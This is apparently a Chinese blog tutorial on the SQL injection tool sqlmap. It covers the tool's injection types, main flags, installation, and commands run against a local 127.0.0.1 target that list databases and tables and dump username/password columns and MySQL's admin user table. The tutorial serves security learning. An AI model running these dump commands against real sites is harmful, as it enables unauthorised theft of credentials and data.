sqlmap的使用详细讲解

原创 已于 2023-05-29 12:25:10 修改 · 2.9k 阅读 · 2 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#数据库
于 2023-05-29 12:25:04 首次发布
sqlmap是一个用于检测和利用SQL注入漏洞的自动化工具,支持多种数据库系统。它采用不同类型的注入方法,如布尔型盲注、时间盲注、报错注入和联合查询注入。通过指定URL,sqlmap可以列出数据库名称、表名、字段名以及获取数据。安装涉及Python环境配置和sqlmap压缩包的解压。文章还提供了几个使用示例,展示如何获取数据库信息。
Python3.8

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

一、sqlmap介绍


  简介:是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的
        url的sql注入漏洞,内置了很多插件
  sqlmap支持的数据库: MySQL、oracle、sql-server、DB2....
  注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞
sqlmap使用的sql注入方式:
    1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入
    2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行
    3、基于报错注入:根据页面返回的错误信息
    4、联合查询注入:根据使用的union的情况下注入

sqlmap的简单使用:
  -u  url:  检测的注入点
  --dbs:   列出所有数据库的名称
  --current-db: 列出当前的数据库名称
  -D:   指定的一个数据库
  --tables:  列出数据库表名称
  -T:   指定的一个表名称
  --columns: 列出所有的字段名
  -C:    指定字段
  --dump:  列出字段的内容
  --users: 获取数据所有的用户信息

安装sqlmap:


  1、安装Python2.7 ,新建一个目录:python2.7
  2、双击Python安装包,安装到python2.7目录
  3、将python2.7添加环境变量
  4、解压sqlmap1.5压缩包到D盘:d:/sqlmap
  5、win+R 输入cmd 进入到D盘
        C:\Users\xiaolin>d:
        D:\>cd sqlmap
        D:\sqlmap>sqlmap.py  回车,如果出现sqlmap图标说明成功


           
二、使用sqlmap


 1、获取数据库的所有数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xxx --dbs
 2、获取当前的数据库名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx --current-db
    获取到的数据库名称: news
 3、获取当前的数据库news所有表名称
 sqlmap.py  sqlmap -u http://127.0.0.1/xx -D news --tables
 4、获取当前的数据库news下news_users表所有字段名称
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users --columns
 5、获取news库下的news_users表的数据
 sqlmap.py  sqlmap -u http://127.0.0.1/nxxx -D news -T news_users -C username,password --dump

 

 

 

 

获取MySQL数据库管理员信息: 
sqlmap.py  sqlmap -u http://127.0.0.1/nxx -D mysql -T  user --dump
 
sqlmap.py  sqlmap -u http://127.0.0.1/xx -D  information_schema  -T tables -C TABLE_NAME,TABLE_SCHEMA --dump
 

您可能感兴趣的与本文相关的镜像

Python3.8

Python3.8

Conda
Python

Python 是一种高级、解释型、通用的编程语言,以其简洁易读的语法而闻名,适用于广泛的应用,包括Web开发、数据分析、人工智能和自动化脚本

SQLMap工具-1】SQLMap简介及简单应用实例
m0_64378913的博客
04-27 4万+
1 SQLMap简介 SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB 。 注意:sqlmap只是用来检测和利用sql注入点,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。 SQLMap
Sqlmap 使用方法小结
0verWatch的博客
08-02 2万+
平常的使用GET方法像–tables –columns -T -D –dbs –dump 啥的就不说了,只是博客几天不发,空着不好,还是得写写东西 --is-dba 当前用户权限(是否为root权限,mssql下最高权限为sa) --dbs 所有数据库 --current-db 网站当前数据库 --users 所有数据库用户 --current-user 当前数据库用户 --random-age...
渗透测试必备:SQLmap详细使用指南,SQL 注入从入门到精通
最新发布
m0_56146626的博客
04-21 842
SQLmap是一款开源的渗透测试工具,主要用于检测和利用SQL注入漏洞。本文介绍了SQLmap的下载安装方法,包括Windows系统的配置步骤,以及基本使用方法和参数详解。SQLmap支持多种目标检测方式,可以通过URL、文件或代理日志获取目标,并提供丰富的请求设置、优化和注入选项。工具还包含探测等级、指纹识别、数据枚举等功能,能够获取数据库信息、表结构和内容。使用时需注意风险等级设置,避免对业务系统造成损害。通过合理配置参数,SQLmap能有效检测SQL注入漏洞并获取数据库敏感信息。
【SQL注入】Sqlmap使用指南(手把手保姆版)持续更新
开水的博客
03-15 6万+
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数,sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
SQLMAP工具详解
weixin_56218159的博客
06-02 1万+
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献; ...
SQLMAP简介及使用方式
weixin_61862241的博客
05-06 9612
SQLMAP是一款由Python开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Server、Access、IBM DB2、SQLite等数据库;基于布尔类型的注入,即可根据返回页面判断条件真假的注入;基于时间的盲注,即不能根据页面返回判断的时候,利用时间线是否延时来判断条件的真假;
Sqlmap全参数讲解之第一篇
小司机的奥拓
07-23 955
(盲注场景): sqlmap -u “http://192.168.137.1/login.php” --data=“user=admin” --keep-alive --null-connection。而L3 L4更多的是通过项目实战来掌握核心技术,针对以上网安的学习路线我们也整理了对应的学习视频教程,和配套的学习资料。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
sqlmap详细讲解
A485860941的博客
04-13 3万+
sqlmap详细讲解,不看后悔一辈子,据说百分之99的人看了都夸赞.
sqlmap进阶—参数讲解
qq_40909772的博客
07-02 4291
1.–level 5:探测等级。   —level 5 参数代表需要执行的测试等级为5,sqlmap一共有5个测试等级1~5,不加等级参数默认是1。使用测试等级5会使用更多的payload,会自动破解出Cookie、XFF等头部注入。在不确定哪个Payload或参数为注入点时,为了保证全面性,建议使用最高的level值。 2.–is-dba:当前用户是否为管理权限。   该命令用于查看当前账户是否为数据库管理员账户,命令如下,数据返回True则表示是管理员。 py2 sqlmap.py -u "http:/
sqlmap post注入经典例题讲解
loog
11-23 1669
在这里我们用如下例题进行讲解,本题是我做过的一道SQL注入之POST注入型题,下面开始本教程。 本题为安恒攻防实验室题,连接:http://101.71.29.5:10001/search.jsp  第一步: 因为是POST注入,首先要知道提交的参数有哪些,在这里就需要配合Burp抓包 进行查看提交参数,下面是我抓包后获得的数据。 在这里我们就看到了POST提交的数据有哪些了,在这里...
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
dzqxwzoe的博客
09-05 5万+
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用数据库4、查看「数据表」5、查看「字段」6、查看「数据」
安全圈最被低估的10个神器:一个比一个强大,大佬都在偷偷用!零基础入门到精通,看这篇就够了!赶紧收藏!
baimao__Ch的博客
02-14 3913
这些冷门的网络安全工具是你工具箱中的强大补充,它们提供了独特的功能,覆盖从侦察到漏洞利用的多个环节。虽然像 Nmap 和 Burp Suite 这样的工具不可或缺,但探索像 CyberChef、BloodHound 和 Impacket 这样的“宝藏工具”能让你在网络安全工作中更加高效和灵活。
sqlmap使用教程大全命令大全(图文)
热门推荐
Cwillchris的博客
03-15 6万+
我们先准备一个靶机,我这里拿经典的SQL大观园靶机 我们再url后面传参http://192.168.98.100/sqli-labs/Less-1/?id=1 接下来我们用此url进行SQLmap的教学http://192.168.98.100/sqli-labs/Less-1/?id=1 一、SQLmap基础操作 1.判断是否存在注入 假设目标注入点是http://192.168.98.100/sqli-labs/Less-1/?id=1,判断具是否存在注入的命令如下所示.
详细SQLMap使用攻略及技巧分享
白昼小丑的博客
03-28 1571
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
SQLmap
qq_41638872的博客
06-23 1945
SQLmap使用
SQLMap使用详解
未完成的歌~的博客
02-19 2万+
文章目录前言:一、SQLMap介绍1、Sqlmap简介:2、Sqlmap支持的注入方式:二、SQLMap安装三、SQLMap使用:1、判断是否存在注入:2、判断文本中的请求是否存在注入:3、查询当前用户下的所有数据库:4、获取数据库中的表名:5、获取表中的字段名:6、获取字段内容:7、获取数据库的所有用户:8、获取数据库用户的密码:9、获取当前网站数据库的名称:10、获取当前网站数据库的用户名称:四、SQLMap进阶:参数讲解1、-- level 5:探测等级2、-- is-dba:当前用户是否为管理权限3
SQLmap使用总结
Alexz__的博客
02-15 6820
1.简介 2.说明书翻译 3. 基础命令汇总 4.基础命令尝试 5.高级用法 壹 sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL进行SQL注入。目前支持的数据库有MySql、Oracle、Access、PostageSQL、SQLServer、IBM DB2、SQLite、Firebird、Sybase和...
SQLMAP深入分析-使用篇(基础使用、进阶命令、tamper脚本)
Love&Share
12-29 2万+
文章目录使用篇基础命令进阶命令输出信息的详细程度目标指定连接时信息指定注入参数指定检测级别指定注入类型枚举信息用例指定数据包注入伪静态注入暴力破解文件操作执行命令UDF提权有状态带外连接:Meterpreter & friends访问 Windows 注册表常规选项Tamper脚本tamper 适用的数据库类型 & 版本自带tamper介绍代码分析攻防 学安全的都知道这个注入神器 Sqlmap,也正是这些神器的出现,我们逐渐变成了“脚本小子”,要想变成大佬,就要求不仅会用还会写,在面试中也.
【每天学会一个渗透测试工具】SQLmap安装教程及使用
菜鸟小羊的博客
07-04 1万+
Sqlmap是一款开源的渗透测试工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值